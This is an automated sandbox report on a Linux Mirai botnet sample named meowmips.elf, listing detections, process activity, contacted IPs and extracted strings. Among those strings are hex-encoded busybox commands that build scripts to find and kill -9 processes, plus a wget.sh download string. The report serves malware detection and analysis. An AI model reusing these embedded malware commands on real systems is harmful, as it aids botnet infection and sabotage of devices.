Edit tour

Linux Analysis Report
meowmips.elf

Overview

General Information

Sample name:meowmips.elf
Analysis ID:1650829
MD5:0c893d7bd9411398fd1f1fb4f625cf0c
SHA1:b1829dbcc5aac316beaa75e85e49c555bc1c6143
SHA256:445620c74ab4d7f8dc3bdee1a98076ca80381616e9067d6f64823c01cc8f3080
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:68
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample reads /proc/mounts (often used for finding a writable filesystem)
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1650829
Start date and time:2025-03-28 04:33:23 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:meowmips.elf
Detection:MAL
Classification:mal68.troj.linELF@0/4@0/0
Command:/tmp/meowmips.elf
PID:6236
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • meowmips.elf (PID: 6236, Parent: 6159, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/meowmips.elf
  • dash New Fork (PID: 6241, Parent: 4331)
  • rm (PID: 6241, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
  • dash New Fork (PID: 6242, Parent: 4331)
  • rm (PID: 6242, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
meowmips.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6263.1.00007f2b14400000.00007f2b1441d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6236.1.00007f2b14400000.00007f2b1441d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: meowmips.elfAvira: detected
        Source: meowmips.elfVirustotal: Detection: 31%Perma Link
        Source: meowmips.elfReversingLabs: Detection: 36%
        Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2
        Source: /tmp/meowmips.elf (PID: 6263)Socket: 127.0.0.1:22448Jump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmpString found in binary or memory: http://0/t/wget.sh
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x67\x72\x65\x70\x20\x2d\x45\x20\x22\x5e\x5b\x5e\x20\x5d\x2b\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2b\x20\x22\x20\x2f" > kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x70\x72\x6f\x63\x2f\x6d\x6f\x75\x6e\x74\x73\x20\x7c\x20\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x3b\x20\x64\x6f\x20\x70\x69\x64\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24\x6c\x69\x6e\x65\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x73\x70\x6c\x69\x74\x28\x24\x32\x2c\x20\x61\x2c\x20\x22\x2f\x22\x29\x3b\x20\x70\x72\x69\x6e\x74\x20\x61\x5b\x33\x5d\x7d\x27\x29" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x3b\x20\x5b\x20\x2d\x6e\x20\x22\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x5b\x20\x2d\x64\x20\x22\x2f\x70\x72\x6f\x63\x2f\x24" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x66\x73\x5f\x74\x79\x70\x65\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24\x6c\x69\x6e\x65\x22" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x31\x7d\x27\x29\x20\x26\x26\x20\x6d\x6f\x75\x6e\x74\x5f\x70\x6f" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x69\x6e\x74\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24\x6c\x69\x6e\x65\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x24\x32\x7d\x27\x29\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x22\x4b\x69\x6c\x6c\x69\x6e\x67\x20\x73\x75\x73\x70\x69\x63\x69\x6f" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x75\x73\x20\x70\x72\x6f\x63\x65\x73\x73\x20\x24\x70\x69\x64\x20\x28\x46\x53\x3a\x20\x24\x66\x73\x5f\x74\x79\x70\x65\x2c\x20\x4d" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6f\x75\x6e\x74\x3a\x20\x24\x6d\x6f\x75\x6e\x74\x5f\x70\x6f\x69\x6e\x74\x29\x22\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x70\x69\x64\x22\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x73\x6c\x65\x65\x70\x20\x31\x20\x26\x26" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x6f\x75\x6e\x74\x5f\x70\x6f\x69\x6e\x74\x22\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75" >> kmount
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x5f\x64\x69\x72\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20" > kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x70\x69\x64\x3d\x24\x28\x62\x61\x73\x65\x6e\x61\x6d\x65\x20\x22\x24\x70\x69\x64\x5f\x64\x69\x72\x22\x20\x7c\x20\x73\x65\x64\x20" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x73\x2f\x5b\x5e\x30\x2d\x39\x5d\x2f\x2f\x67\x22\x29\x3b\x20\x5b\x20\x2d\x6e\x20\x22\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x2d\x66\x20\x22\x24\x70\x69\x64\x5f\x64\x69\x72\x2f\x6d\x61\x70\x73\x22\x20\x5d\x20\x26\x26\x20\x5b\x20\x2d\x72\x20" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x70\x69\x64\x5f\x64\x69\x72\x2f\x6d\x61\x70\x73\x22\x20\x5d\x20\x26\x26\x20\x6f\x75\x74\x70\x75\x74\x3d\x24\x28\x63\x61" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x74\x20\x22\x24\x70\x69\x64\x5f\x64\x69\x72\x2f\x6d\x61\x70\x73\x22\x29\x20\x26\x26\x20\x5b\x20\x24\x28\x65\x63\x68\x6f\x20\x22" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x24\x6f\x75\x74\x70\x75\x74\x22\x20\x7c\x20\x77\x63\x20\x2d\x63\x29\x20\x2d\x67\x74\x20\x31\x30\x30\x20\x5d\x20\x26\x26\x20\x21" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x65\x63\x68\x6f\x20\x22\x24\x6f\x75\x74\x70\x75\x74\x22\x20\x7c\x20\x67\x72\x65\x70\x20\x2d\x71\x45\x20\x22\x2f\x6c\x69\x62" >> kat
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x7c\x2f\x6c\x69\x62\x36\x34\x2f\x7c\x2e\x73\x6f\x22\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22" >> kat
        Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x5f\x64\x69\x72\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20" > kat
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/meowmips.elf (PID: 6236)SIGKILL sent: pid: 4430, result: successfulJump to behavior
        Source: classification engineClassification label: mal68.troj.linELF@0/4@0/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/meowmips.elf (PID: 6236)File: /proc/6236/mountsJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/6236/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1582/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1582/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/3088/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/230/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/231/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/232/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1579/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1579/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/233/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1699/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1699/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1335/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1335/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1698/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1698/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1334/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1334/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1576/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1576/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/2302/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/2302/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/236/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/237/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/910/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/912/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/912/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/2307/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/2307/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/918/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/918/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/14/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/15/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/16/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/17/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/18/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1594/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1594/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/120/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/121/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1349/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1349/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1/mapsJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/122/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/243/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/123/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/2/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/124/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/3/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/4/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/125/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/126/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1344/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1344/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1465/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1465/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1465/mapsJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1586/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1586/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/127/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/6/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/248/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/128/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/249/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1463/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1463/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1463/mapsJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/800/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/800/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/9/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/801/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/801/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/20/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/21/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1900/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/1900/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/22/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/23/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/24/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/25/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/26/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/27/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/28/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/29/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/491/cmdlineJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/491/fdJump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)File opened: /proc/250/cmdlineJump to behavior
        Source: /usr/bin/dash (PID: 6241)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9Jump to behavior
        Source: /usr/bin/dash (PID: 6242)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9Jump to behavior
        Source: /tmp/meowmips.elf (PID: 6236)Queries kernel information via 'uname': Jump to behavior
        Source: meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmpBinary or memory string: vmwarem
        Source: meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmpBinary or memory string: vmware
        Source: meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmpBinary or memory string: qemu-arm2QB
        Source: meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmpBinary or memory string: cUqemu: uncaught target signal 11 (Segmentation fault) - core dumped
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmpBinary or memory string: cU/tmp/qemu-open.dOB3SI\
        Source: meowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmpBinary or memory string: qemu-arm
        Source: meowmips.elf, 6236.1.00005563bfe71000.00005563bff39000.rw-.sdmp, meowmips.elf, 6263.1.00005563bfe71000.00005563bff39000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: meowmips.elf, 6236.1.00005563bfe71000.00005563bff39000.rw-.sdmp, meowmips.elf, 6263.1.00005563bfe71000.00005563bff39000.rw-.sdmpBinary or memory string: cU!/etc/qemu-binfmt/mips
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp, meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmpBinary or memory string: <x86_64/usr/bin/qemu-mips/tmp/meowmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/meowmips.elf
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmpBinary or memory string: /tmp/qemu-open.dOB3SI
        Source: meowmips.elf, 6236.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmp, meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
        Source: meowmips.elf, 6263.1.00007ffed2aa7000.00007ffed2ac8000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: meowmips.elf, type: SAMPLE
        Source: Yara matchFile source: 6263.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6236.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: meowmips.elf, type: SAMPLE
        Source: Yara matchFile source: 6263.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6236.1.00007f2b14400000.00007f2b1441d000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
        File Deletion
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media1
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650829 Sample: meowmips.elf Startdate: 28/03/2025 Architecture: LINUX Score: 68 16 109.202.202.202, 80 INIT7CH Switzerland 2->16 18 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->18 20 2 other IPs or domains 2->20 22 Antivirus / Scanner detection for submitted sample 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected Mirai 2->26 7 meowmips.elf 2->7         started        10 dash rm 2->10         started        12 dash rm 2->12         started        signatures3 process4 signatures5 28 Sample reads /proc/mounts (often used for finding a writable filesystem) 7->28 14 meowmips.elf 7->14         started        process6
        SourceDetectionScannerLabelLink
        meowmips.elf31%VirustotalBrowse
        meowmips.elf36%ReversingLabsLinux.Backdoor.Gafgyt
        meowmips.elf100%AviraEXP/ELF.Agent.J.8
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches

        Download Network PCAP: filteredfull

        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://0/t/wget.shmeowmips.elf, 6236.1.00007f2b1445e000.00007f2b14468000.rw-.sdmp, meowmips.elf, 6263.1.00007f2b1445e000.00007f2b14468000.rw-.sdmpfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          54.171.230.55
          unknownUnited States
          16509AMAZON-02USfalse
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          54.171.230.55sync.mips.elfGet hashmaliciousUnknownBrowse
            na.elfGet hashmaliciousPrometeiBrowse
              Okami.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  na.elfGet hashmaliciousPrometeiBrowse
                    arm5.elfGet hashmaliciousUnknownBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        bin.sh.elfGet hashmaliciousMiraiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                              91.189.91.43sync.arm6.elfGet hashmaliciousUnknownBrowse
                                aarch64.elfGet hashmaliciousMiraiBrowse
                                  sync.superh.elfGet hashmaliciousUnknownBrowse
                                    sync.arm5.elfGet hashmaliciousUnknownBrowse
                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                        sync.x86.elfGet hashmaliciousUnknownBrowse
                                          sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                            sync.arm4.elfGet hashmaliciousUnknownBrowse
                                              bin.sh.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  91.189.91.42sync.arm6.elfGet hashmaliciousUnknownBrowse
                                                    aarch64.elfGet hashmaliciousMiraiBrowse
                                                      sync.superh.elfGet hashmaliciousUnknownBrowse
                                                        sync.arm5.elfGet hashmaliciousUnknownBrowse
